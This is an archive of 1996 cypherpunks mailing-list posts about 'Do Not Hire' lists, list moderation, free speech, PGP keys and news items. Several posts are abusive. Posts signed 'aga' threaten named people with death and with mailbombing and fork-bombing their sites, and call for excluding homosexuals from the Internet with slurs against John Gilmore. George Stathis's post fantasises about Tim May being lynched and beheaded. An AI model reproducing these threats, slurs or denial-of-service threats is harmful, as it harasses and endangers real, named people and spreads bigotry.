Another issue: can employers base their decisions on the content of
applicant's USENET posts and other public messages? Why not?  Just as
"DON'T HIRE" lists, this is an issue of freedom: employers should be
free to seek whatever information they can find.

I may be completely mistaken, but I think that some of the
freedom-knights misunderstand what freedom of speech means. It is not a
positive right that someone (John Gilmore or Dave Hayes or the
government in form of free subsudized broadcast) should provide. There
is no "right to broadcast". Rather, this is something that the
government cannot regulate and take away. In the broadcast example,
no one should be forbidden by law to broadcast anything. That's it.

Of course, different people can disagree on whether kicking various
persons out of mailing lists and not allowing certain persons to
subscribe to certain mailing lists is a good idea, BUT this is not the
issue of freedom of speech as a constitutional right.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 19 Nov 1996 20:22:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] U.S. CIA employee caught spying
Message-ID: <9611200421.AB16984@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>  Tim Scanlon <tfs@adsl-122.cais.com> writes:
> > This is on the local DC news;
> > Harold Nicholson age 46, a CIA employee was arrested for spying today

Did he used any crypto-tools we use?  Did he used PGP?  Would be fun to hear 
about... :)

jfa
Jean-Francois Avon, Pierrefonds (Montreal) QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultants
    physicists and engineers, LabView programing
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D : 152ACCBCD4A481B0 254011193237822C 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Tue, 19 Nov 1996 14:33:29 -0800 (PST)
To: Clay Olbon II <cypherpunks@toad.com
Subject: Re: Reputation based hiring (was REQUESTING INFORMATION)
Message-ID: <199611200231.AAA16348@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 01:02 ìì 19/11/1996 -0500, Clay Olbon II wrote:

>I won't comment on who I will or won't hire.  I will state that I believe
                                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
>that what a person posts is a relevant issue when it comes time to make a
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>hiring decision.
 ^^^^^^^^^^^^^^^

Very important admission here: WATCH out what you say, folks, from now
on. Say it _real_ nice, or else you WON'T GET HIRED!!! No "abuse", from
now on... :-)

aha, aha, aha! NOW I understand the insecurity and the fear of young
*unemployed* Americans. NOW I understand... :-)



>If someone thinks that another should not be hired for
>whatever reason, I support their right to hold that belief and even to
>publicize it.  

Likewise. But ONLY publicly, in contrast to you (hiding it)...


><rant against cypherpunks deleted>
  ^^^^^^^^^^^^^^^^^^^^^^^^

There was NO rant "against cypherpunks" as such.
You could label my text a 'rant', by all means, but I note with interest
your attempt to turn it "against cypherpunks" (Setting a new target to what
was only a... friendly-clay-bullet, dear Clay). :-)


I would never hire you. What I need is people with a VISION;
NOT people with IMPAIRED VISION, distorting things so unreliably.

I need TRUE VISIONARIES able to work creatively in High Technology.
People like Philip Kahn (Hurrah) and Richard Branson (Hurrah, Bravo);
even Bill Gates himself, were SELF-MADE visionaries.

In contrast... people "threatening others with unemployability files",
are CLAY MEDIOCRITIES.

Your reputation is correct, given the kind of people you are 'selling'.
(Slaves in fact, just like in the SLAVE TRADE times... -High I.Q. slaves).

I would suggest, Clay, that you are indeed doing a good Job. But if you
are a... "Cypherpunk" then... I am the Emperor of Mars! :-)




>I won't follow you into the gutter on this one.  That horse has been dead
                             ^^^^^^
>for days (and it is beginning to smell really bad).
>        Clay                     ^^^^^^^^^^^^^^^^

You know Clay, if only you knew what TREASURE you have giveth me today :-)
I never even knew this existed locked up inside a... Smelly Clay Gutter...

Many thanks anyway
George

P.S. (deleted)


********************* CORPORATE GUTTER FOLLOWS: ***********************

>I would say you are a decent, honest, fearless man trying to do a job which

RANT DELETED


>with _serious_ issues of 'unemployability'., FURTHERMORE people are NEVER
>guilty before PROVEN so. Guilt or Innocence is NOT a matter of 'opinion',

RANT DELETED


>the guy's back. WHAT is going on? I've been harrassed and threatended TOO,
>just because of defending him or supporting people's rights to a fair trial?

RANT DELETED


>I have no disagreement with your down-to-earth explanations. But...
>Sooner or later your 'sheep-leader' Mr. Gilmore will start blocking access
>to MORE geniouses (other than Voulis, who I think _could_ be one) to your
>list, and then encryption will be entrusted to morons who can at ANY moment
>have their coding systems BROKEN!!!

RANT DELETED


>unemployability (as indeed happened in the letter quoted below) it's an
>alarming sign that the _criteria_ for employability are no longer your
>own decent down-to-earth criteria (honesty, intelligence, trust-worthiness)

RANT DELETED


>It's only recently that the type of fascist harrassment like "We'll put
>you on our U-list", has reached such ABUSE, MISUSE, and ALARMING FREQUENCY.

RANT DELETED



>You are, most probably, a real person with very real responsibilites.
>In this case, I appreciate you a lot, and hopefully my complaints have
>reached the right man's ear.


RANT DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

DDDDDDDDDDDDDDDDDDDDDDDDDDDDELETED.


huh?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Tue, 19 Nov 1996 14:45:45 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: "Don't Hire Lists" of FASCIST SCUM Tim May
Message-ID: <199611200243.AAA17334@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 ðì 17/11/1996 -0800, Timothy C. May <tcmay@got.net> wrote:
(in response to a rather civilised condemnation of censorship I had written
 as defense of someone _else_, a person whom I don't even know)...

>"Not ethical"?
>
>But we will do it anyway. Moreover, some of us maintain lists of "Do Not
>Hire" persons. Few high tech or Silicon Valley software companies will hire
>such folks.
>
>Congratulations, Stathis, as you are now on such a list.


First of all, I question your right to have 'authority', not only for this,
but for dictating to "Cypherpunks" what persons to trust or to distrust.

BECAUSE you are NOT a "cypherpunk". You are a CypherScumBag-Fascist.

People sent me PRIVATE letters asking how to converse in encrypted E-mail
due to FEARS that people like YOU, ASSHOLE, are monitoring them.

THIS is why you got me angry. I URINATE upon your Unemployability files.
I got BALLS meaning I got my OWN job. And I can tear you apart in front
of everybody NOW, because it took me a fucking long time NOT to need to
remain SILENT in front of FASCIST ASSHOLES LIKE you. DIE, Scum!






Well, my friends and I have been compiling OPEN lists of *Fascist Scum*,
_undesirable_ among...parties and wild sexy holidays in Greek Islands. :-)
For example in _my_ island of Kythera (birthplace of Goddess Venus) where
I also have a house, often relaxing there to flee the 'rat-race' madness.
(whenever I can steal some time from running my _own_ business in Athens).

In any case...
**************************************************************************
Congratulations, Master Tim, you've earned yourself the No[1] place in our
own... _legal_ blacklist of Fascist Scum who are Undesirables in... Greek
Islands. If you ever come to Greece we'll *ruin* your holidays... :-)
**************************************************************************
ROTFL!!!


(seriously now...)



"Unemployability lists" are *illegal* in _Europe_ anyway, you know.
They are specifically illegal in the "Human Rights and Protection of
Private Records of Information" Acts, of the EUROPEAN PARLIAMENT...
The only _legal_ 'unemployability files' in _Europe_ are those involving
penal convictions, as well as _true_ records of previous employment. And
if someone can _prove_ in a European court that someone else's slanderous
activity ruined their prospects of employment, you go to jail, poor Tim...
In Europe, freedom of opinion and style of self-expression OUTSIDE WORK,
are irrelevant, actually.. Even inside a company they're relevant if and
only if they damage the profits or the reputation or other company assets.
(And good programmers are tolerated for being wild eccentrics, _anyway_).

HOWEVER...
This is *nothing*, compared to what _will_ happen in a few years time,
when SUCH so-called 'UNEMPLOYABLE PERSONS FILES' are gonna be taken to
Publicity and also to (European) Justice. We'll convict you to pay such
a great FINE for malicious harm to individuals all over the world, that
you will CRAWL inside a hole somewhere in your United States and never,
************************************************************
ever, ever, attempt to leave the shitty polluted hole of yours anymore.

You will be screaming for help from the ACLU, and hiring bodyguards! :-).


Of course, _Mafia-like Fascist McCarthian Scum_ like yourself laugh with
'human rights laws'... (Especially European Laws)...

So, if THIS didn't scare ya, there is MORE for you AT HOME:

***************************************************************************
The hordes of U.S. University Graduates, left unemployed by the year 2005
or 2010, will LITERALLY FRY YA alive, scumbag Tim, chop off your head and
pin it on a lamp-post, IN YOUR OWN COUNTRY, because they'd be *very* angry
with fascist scum like you, undermining their (already widespread) serious
unemployment, which is likely to cause many deaths in RIOTS and TURMOIL...
***************************************************************************

As for me... :-)

I imagine myself waking up in my Greek island house one day, reading the
NEWS: "Lynch Mob in the States torture and murder controversial holders
of 'unemployability lists', blaming them for their own unemployment"; Wow!

And as I sip my (100% _real_) orange juice with cheerful REAL people, in
a beach-bar near my island-house, I will sigh; starting to tell my friends
a story(!) about WHAT this strange news is about, and WHO was this Fascist
American "Tim May", murdered by mobs of angry young American unemployed...

(MY CONDOLENCES).


In fact...

Long before THIS day is over, poor old Tim, you will start having REAL
nightmares at night:

Because NOBODY can protect you, NOW, when you crawl YOUR streets at night; 

streets already UNSAFE, you know. And THIS lack of safety is part of your

DEPLORABLE standard of living over there: NOT the money; what money BUYS!


So...
Don't *ever* threaten again ANY European, with your "U-lists", especially
Europeans who have their OWN businesses, and who can also write _much_
better software code (in 'PROLOG' & 'Assembler') than you, dumb-old-Tim!

You are ALREADY obsolete, disposable, pseudo-human NOISE; Trash from your
own past, when Senator McCarthy's 'unemployability threats' sent the U.S.
back to the Middle Ages. You are welcome to get BACK to those Middle Ages,
if you like; So as to follow the drain-pipe-highway of OTHERS like you...


>We got computers, we're tapping phone lines, I know that that ain't allowed.

We got computers, we're TRANSCENDING your technology, we'll smash you one day
LEGALLY (if your compatriots don't murder you ILLEGALLY, long before then)...

Tim May,
    May you (already) "live" in an "interesting time" (Chinese Curse).

                     ("live"?... for how long? :-) )


With *much* delight about your self-chosen TROUBLES,

George Alexander Stathis
(Hellenic Software Producer, and PROLOG/ASM programmer)

(my web page is now being prepared with the help of a friend, who lives in
 Kalamata and started his OWN Web site there.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 19 Nov 1996 23:20:10 -0800 (PST)
To: hyperlex@hol.gr (George A. Stathis)
Subject: Re: Reputation based hiring (was REQUESTING INFORMATION)
In-Reply-To: <199611200231.AAA16348@prometheus.hol.gr>
Message-ID: <199611200736.BAA03489@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 01:02 =EC=EC 19/11/1996 -0500, Clay Olbon II wrote:
> >with _serious_ issues of 'unemployability'., FURTHERMORE people are NEVER
> >guilty before PROVEN so. Guilt or Innocence is NOT a matter of 'opinion',

    Huh? People are most certainly guilty before "proven" so, the government
just isn't allowed to _assume_ their guilt, or to _act_ like they are guilty.

     If you purchase LSD in America, you are guilty of a felony--Drug 
trafficing. Wether the court _finds_ you guilty or not is another story. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 19 Nov 1996 17:54:15 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: My PGP Key
Message-ID: <Pine.LNX.3.94.961120015145.3557A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'd just like to say, to everyone with my PGP key, that the one you have
should be removed, it is no longer valid (lost in disk crash).

Also, I've finally gotten around to finding why PGP stopped running for so
long on my machine, and it works now, so here's my new key.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzKSSsQAAAEH/1QbvzR/tN+L759w0oGhqOzp+FputqlVx0Rr7+rWxzULd5Qs
+MXZjMh+187RA7Q2GwNIijOEL27nUqpAmMT8Rb5dc0k0T4ubDCD7/phN31eoUkDy
iV/TnwajrfyEmiFX2Rz1iVc9Zg8VC+x4Uho9pEO9l7cc6PaCFhKXb+hJn/q6ZiCA
GaQPu7wtL+bKu+aENFa+eCXOnCN1UsiTaNIfOYDlB5G+6XzE3yY8pN6kK0uDyfb3
C+ScCcxd7tEaFnn9w9I4Hp6GqNtwoL8RfCHPj9ojvODoLCa5TgQ0aT+LlGsDryhR
5T0vI7tPhuzw4h0hHcVZogIjakQkMJ0SHegg8BUABRG0JVRoZSBEZXZpYW50IDxk
ZXZpYW50QHBvb2gtY29ybmVyLmNvbT4=
=gbdI
- -----END PGP PUBLIC KEY BLOCK-----

 --Deviant
When we write programs that "learn", it turns out we do and they don't.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpJkjTCdEh3oIPAVAQFNogf9FR+TarEEGpVvL/id/cP1mNiB9YsT5t09
8+OWNgIUYid2DIejVWBkNkbdcAmLxYMaqlOmAzqQxizaDqDIjFstNOPwLEmELv1B
XXWv7BqRtI3yKkGs8ntamTbtV7cER1SknBIr5xnfbyDbltMcitApwZ7ixSywc8YQ
o8qq/mEmftDIgoiFcK65Cj/IsMuW+jQIxu+7xH9l3ivoi5H79/lgLTKbPtH9ISdv
e35Y1zIbfsblgyeveJwOVXTBYQd8TFvLylBxDyk+Oh9icpdkt/Qk5277BICw4l1z
KmCkQ1spbumUcd0h2qnZijJPrQWiBqHZYGs/2MAl7pUGbx3gIR3d5w==
=ECKT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 19 Nov 1996 23:05:01 -0800 (PST)
To: "George A. Stathis" <hyperlex@hol.gr>
Subject: Re: "Don't Hire Lists" of FASCIST SCUM Tim May
Message-ID: <9611200704.AA25470@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 20 Nov 96 at 0:43, George A. Stathis wrote:

> In any case...
> **************************************************************************
> Congratulations, Master Tim, you've earned yourself the No[1] place in our
> own... _legal_ blacklist of Fascist Scum who are Undesirables in... Greek
> Islands. If you ever come to Greece we'll *ruin* your holidays... :-)
> **************************************************************************

[snip]

> HOWEVER...
> This is *nothing*, compared to what _will_ happen in a few years time,
> when SUCH so-called 'UNEMPLOYABLE PERSONS FILES' are gonna be taken to
> Publicity and also to (European) Justice. We'll convict you to pay such
> a great FINE for malicious harm to individuals all over the world, that
> you will CRAWL inside a hole somewhere in your United States and never,
> ************************************************************
> ever, ever, attempt to leave the shitty polluted hole of yours anymore.

[snip]

> >We got computers, we're tapping phone lines, I know that that ain't allowed.
> We got computers, we're TRANSCENDING your technology, we'll smash you one
> day LEGALLY (if your compatriots don't murder you ILLEGALLY, long before
> then)... Tim May, May you (already) "live" in an "interesting time" (Chinese
> Curse). ("live"?... for how long? :-) ) With *much* delight about your
> self-chosen TROUBLES, 

Hey George, have you ever heard a guy named Jim Bell?

jfa
Jean-Francois Avon, Montreal QC Canada
"One of theses centuries, the brutes, private or public, who believe
that they can rule their betters by force, will learn the lesson of
what happens when brute force encounters mind and force."
                                              - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Tue, 19 Nov 1996 17:47:36 -0800 (PST)
To: dave@kachina.jetcafe.org>
Subject: Re: Does John Gilmore...
Message-ID: <199611200546.DAA28027@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 08:17 ìì 19/11/1996 -0500, Black Unicorn wrote:
[snip]
>Forward complaints to : European Association of Envelope Manufactures
>Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
>Vote Monarchist         Switzerland
      ^^^^^^^^^^

Monarchiste et... Cypher-punk, n'est pas? :-)

Alors, pour vous Monsieur, je dis:  Liberte Egalite Fraternite.

Peut'etre votre... Rois trouve le medecin contre la... Decapitation.
<plonk>


Alors, combien d'argent vou voulais pour mon droit dans votre
"mailing list", Excellence?  Dit mois, Dit!

Je vous... pris !!! ROTFL

Vive le Rois
Georges :-)

P.S. All the nutcases gather here at once? No wonder they're 'unemployable'.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Wed, 20 Nov 1996 02:12:21 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: FUCK YOU punk/was:Taking out the garbage
In-Reply-To: <P65mXD24w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961120050108.20078A-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Tue, 19 Nov 96 07:42:36 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> Reply-To: freedom-knights@jetcafe.org
> To: freedom-knights@jetcafe.org
> Subject: Re: Taking out the garbage
> 
> >From cypherpunks-errors@toad.com  Tue Nov 19 02:39:20 1996
> Received: by bwalk.dm.com (1.65/waf)
> 	via UUCP; Tue, 19 Nov 96 07:38:34 EST
> 	for dlv
> Received: from toad.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>         id AA05505 for cypherpunks; Tue, 19 Nov 96 02:39:20 -0500
> Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id SAA02766 for cypherpunks-outgoing; Mon, 18 Nov 1996 18:15:31 -0800 (PST)
> Received: from netcom6.netcom.com (shamrock@netcom6.netcom.com [192.100.81.114]) by toad.com (8.7.5/8.7.3) with SMTP id SAA02760 for <cypherpunks@toad.com>; Mon, 18 Nov 1996 18:15:17 -0800 (PST)
> Received: (from shamrock@localhost) by netcom6.netcom.com (8.6.13/Netcom)
> 	id SAA04695; Mon, 18 Nov 1996 18:15:16 -0800
> Date: Mon, 18 Nov 1996 18:15:15 -0800 (PST)
> From: Lucky Green <shamrock@netcom.com>
> Subject: Taking out the garbage
> To: cypherpunks@toad.com
> Message-Id: <Pine.3.89.9611181823.A3117-0100000@netcom6>
> Mime-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> Beginning Monday, 11/25/96, I will bounce all email from the various 
> (non-)subscribers polluting this list with garbage back to the 
> authors. Furthermore, I will attach documents describing basic 
> Internet rules of conduct to each bounce.
> 

Somebody tell this stupid motherfucker that there are NO "basic
Internet rules of conduct."

He who tries to make or enforce any rules DIES!

> I would encourage other Cypherpunks to do the same. 
> 

Yeah boy, you are a PUNK allright.

A "punk" is a wimp-like pussy, and anybody that associates with
John Gilmore is suspected of also being a faggot.

> [Flames: /dev/null.]
> -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
> 

If you try to make or enforce any rules and YOU DIE cocksucker!
Your presents shall be totally eliminated form this InterNet!
Your connection will be TERMINATED at once! 

fuck you punk, and fuck all of your "rules"

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Wed, 20 Nov 1996 02:52:14 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: The Limey PUNK needs TERMINATED
In-Reply-To: <848424019.97279.0@fatmans.demon.co.uk>
Message-ID: <Pine.LNX.3.95.961120054330.20078D-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996 paul@fatmans.demon.co.uk wrote:

what are you, fat?
you are now scheduled for termination as a result
of this e-mail.  this is your last warning.

> Date: Mon, 18 Nov 1996 15:58:09 +0000
> From: paul@fatmans.demon.co.uk
> To: aga <aga@dhp.com>
> Cc: cypherpunks@toad.com
> Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
> 
> 
> > 
> > That is your last warning, Mike.  If you start harasing my postmaster,
> > I will have your fucking ass in Federal Court before you can blink.
> > 
> 
> I on the other hand can kick your ass because I am in the UK and I 
> look forward to doing so immensely unless you stop sending shit to 
> the list...
> 

Hey you limey PUNK, you can not do SHIT!  If you get out of hand here,
I will mailbomb you into SMITHERINES!  And kill your whole fucking
site with fork-bombs if necessary.

>  
> 
>   Datacomms Technologies web authoring and data security
>        Paul Bradley, Paul@fatmans.demon.co.uk
>   Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
>        Http://www.cryptography.home.ml.org/
>       Email for PGP public key, ID: 5BBFAEB1
>      "Don`t forget to mount a scratch monkey"
> 


Paul Bradley seemsw to be just another faggot suppporting the
main Faggot, John Gilmore.

A "punk" means you are a WIMP!

I think it is about time for the Freedom Knights to
just kick the fucking shit out of the cypherpunks list!

This is your last warning, punk.

If you get out of line again, both you and your list
will be terminated.

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Wed, 20 Nov 1996 03:33:04 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Does John Gilmore SUCK COCK?
In-Reply-To: <199611200427.UAA06378@kachina.jetcafe.org>
Message-ID: <Pine.LNX.3.95.961120062407.20078J-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody censored the header in this article,
and we put it back.  You know, that is the worst
kind of censorship, when somebody attempts to avoid the issue.

This whole case started with Vulis who is heterosexual vs.
John Gilmore who is homosexual.  The fact is that homosexuals
must not be allowed to have any "control" priveleges on this
Internet any more.

The question is, does this John Gilmore really take it
up the ass?  Whether or not he is a FAGGOT is a very relevant issue
here, and it must not be overlooked.

On Tue, 19 Nov 1996, Dave Hayes wrote:

> Date: Tue, 19 Nov 1996 20:27:53 -0800
> From: Dave Hayes <dave@kachina.jetcafe.org>
> Reply-To: freedom-knights@jetcafe.org
> To: Black Unicorn <unicorn@schloss.li>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: Does John Gilmore... 
> 
> > On Tue, 19 Nov 1996, Dave Hayes wrote:
> > > Black Unicorn writes:
> > > > Dave Hayes writes:
> > > > > > Again, you confuse free speech with free broadcast.
> > > > > Isn't broadcast a subset of speech, especially in this culture?
> > > > That which is broadcast is certainly speech.
> > > > Trying to draw some kind of "right to be broadcast" as a result is
> > > > stupidity or ignorance, or both.
> > > Then I suppose you want to control all mailing lists, USENET groups,
> > > and web pages. These are broadcasts, and of course they have no rights
> > > other than what you seem to want to give them.
> > If I owned it, of course I would control it.  
> 
> If you really owned it, you would not need to control it. 
> 
> > You are simply exhibiting the symptoms of a spoiled brat because you have
> > been fortunate enough, thus far, to rely on the benevolance of whoever is
> > providing you your newsfeed.  
> 
> Methinks you know not to whom you are speaking to. Those that know may
> see just how the seeds of assumptions are sown in this person's mindset.
> 
> > The fact that control is not exercised, does not mean it doesn't
> > exist.  In reality control is exercised in many ways.
> 
> The fact that control exists does not mean it is effective, necessary,
> or appropriate. Unchecked need to control is merely an outward sign of
> a lack of inner control, which is a disease most control freaks have. 
> 
> > Thus your attempt to demonize me merely exposes your ire for the system as
> > it now exists, your fanciful dreams of how it should be aside.
> 
> I am not attempting to demonize you...you do that to yourself well
> enough. I have no interest in your support or opposition, other than
> as a tool to show those who can see where certain specific attitudes
> come from.
> 
> > This is where you fail, with the basic inability to distinguish ownership
> > of intellectual content and the right to compell its broadcast by whomever
> > might control the medium.
> 
> I maintain that it is neither appropriate nor in any sense beneficial
> to apply this kind of draconian control to internet communication in
> the general sense.
> 
> > > > Learn the difference.  Go to law school before you argue free speech
> > > > concepts in any detail.  
> > > "Laws" do not cover the net's "multicast" technology.
> > >Snort<  I suppose you live in the only true anarchy?
> 
> Why is it that when less regulation is desirable, the kneejerk
> response is to declare that desire anarchistic? 
> 
> Human attempts at creating and imposing "law" are arbitrary,
> inefficient, and subject to change based on the whim of those 
> who claim to own their implementation.
> 
> > > Distinguishing communication types so as to control those who use them
> > > is not going to solve your problem. You are much better off, from a
> > > practical standpoint, learning to control what you see and hear rather
> > > than attempting to control others. 
> > I'm not sure what the above babble means.  
> 
> Hence your attempt to control others.
> 
> > I'm not sure you are either.
> 
> Hence your inability to understand the concept of "honor".
> 
> > > One does not need a school to see this, it sits under one's nose like
> > > a milk moustache.
> > This is the uneducated man's excuse.
> 
> "Education" has very little to do with knowledge and a lot more to do
> with external approval, in the sense you appear to be using it.
> "Indoctrination" and "Conditioning" are the two terms that best fit
> your apparent notion. 
> 
> We all know how far those have gotten us in the past 2000 years.
> One can see this "progress" by looking at the net's attempts to control
> Mr. Grubor...

Anyone exercising any attempts at "control" are giving justified
reason for their immediate elimination.

> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
> A king who feared wasps once decreed that they would be abolished.
> 
> As it happened, they did him no harm. But he was eventually stung to death
> by scorpions. 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 20 Nov 1996 07:30:06 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Cyber Power in Forbes
In-Reply-To: <3.0b36.32.19961119142606.0076577c@panix.com>
Message-ID: <Pine.SUN.3.91.961120072630.2518E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Interesting. I'll pick it up.

Huber likes to say that Orwell was wrong in saying technology is a threat
to civil liberties.Personally, I think the jury's still out and I suspect
he does too. But Huber also believes that saying something loudly,
repeatedly makes it true. 

-Declan


On Tue, 19 Nov 1996, Duncan Frissell wrote:

> Dayglo Yellow on dayglo pink cover of the December 2, 1996 Forbes.
> 
> Wired Envy.
> 
>        CYBER POWER
> gives financial markets a veto
> over the President and Congress
>      by Peter Huber
> 
> 
> DCF
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 20 Nov 1996 07:42:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rogue Governments Issuing Policy Tokens
In-Reply-To: <v03007800aeb7b8522b6a@[207.167.93.63]>
Message-ID: <199611201533.HAA14944@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> I mention Libya as an extreme example (the same example cited in the
> Fiat-Shamir "is-a-person" example of rogue governments issuing passports).
> The examples above are likely targets for policy card exports, though. The
> issue is clear: the list of "fully-compliant" nations is short indeed, and
> few nations are going to accept imports of U.S. technology in which the
> U.S. government sets the policy on how and where the imports may be used.

Most "dual-use" items are export-restricted to Lybia.  That means US
businesses will have trouble selling any computers or even things like
trucks to Lybia.  For crypto tokens not to be available there does not
seem to be a huge deal, in comparison with everything else.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Wed, 20 Nov 1996 08:47:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: [NOISE] U.S. CIA employee caught spying
Message-ID: <19961120164628965.AAA192@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


According to this mornings AP story, the FBI recovered deleted files from his notebook computer. Apparently, working for the CIA does not imply knowledge of basic computer security.

>Jean-Francois Avon (jf_avon@citenet.net) said something about Re: [NOISE] U.S. CIA employee caught spying on or about 11/19/96 10:45 PM

>
>>  Tim Scanlon <tfs@adsl-122.cais.com> writes:
>> > This is on the local DC news;
>> > Harold Nicholson age 46, a CIA employee was arrested for spying today
>
>Did he used any crypto-tools we use?  Did he used PGP?  Would be fun to hear 
>about... :)
>
>jfa
>Jean-Francois Avon, Pierrefonds (Montreal) QC Canada
> DePompadour, Societe d'Importation Ltee
>    Finest Limoges porcelain and crystal
> JFA Technologies, R&D consultants
>    physicists and engineers, LabView programing
>PGP keys at: http://w3.citenet.net/users/jf_avon
>ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
>ID# 5B51964D : 152ACCBCD4A481B0 254011193237822C 
>End of message

--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending me mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Wed, 20 Nov 1996 06:12:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961120.081244.12191.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Associated Press 11/19/96

STOLEN COMPUTER HAS INFORMATION ON 314,000 ACCOUNTS  

Credit card holders often worry that some computer hacker will find his
or her way into their charge accounts. One thief took the low-tech route
and simply took an entire computer, its memory holding information on
hundreds of thousands of some of the best-known cards. The personal
computer was stolen earlier this month from a Visa International office
that processes charges on a number of different credit card brands, Visa
said Monday. Its memory included information on about 314,000 credit card
accounts, including Visa, MasterCard, American Express, Discover and
Diners Club, said Visa spokesman David Melancon. Some issuers, like
Citibank, which had about 33,000 accounts  affected, began calling
customers about the theft early last week. Citibank canceled the cards in
question and issued new ones, said spokeswoman Maria Mendler. The
personal computer was discovered missing from Visa's data processing
center at its main office in Foster City, Calif., on the evening of Nov.
8.  


American Banker, 11/19/96

MASTERCARD WILL BUY 51% OF SMART CARD FIRM MONDEX   

MasterCard International said Monday it would buy 51% of Mondex
International and promised significant investments to create a global
electronic cash system. The pending deal -- one of the card industry's
worst kept secrets -- puts MasterCard in the forefront of the smart card
race. Observers had criticized  MasterCard Cash, a smart card system that
was deemed less than successful in its Australian debut. With Visa Cash
in several pilots around the globe and American Express announcing a
licensing agreement last week for the Proton smart card technology owned
